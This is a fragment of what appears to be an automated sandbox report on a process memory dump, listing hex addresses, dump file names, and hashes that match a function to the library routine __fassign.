                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed7d
                                                                                                                                                                                                          0x0211ed30
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed3c
                                                                                                                                                                                                          0x0211ed43
                                                                                                                                                                                                          0x0211ed4b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

APIs
Memory Dump Source
• Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
• Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 9a4ca070c0ed9bbcf2bba79b13e41de82560de5028b8313f6a6d13296ce437e2
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: A391B031D0030AEEDF25DF98C8497EEBBB5EF45318F20807AD816A7691E7705A81DB81
Uniqueness

Uniqueness Score: -1.00%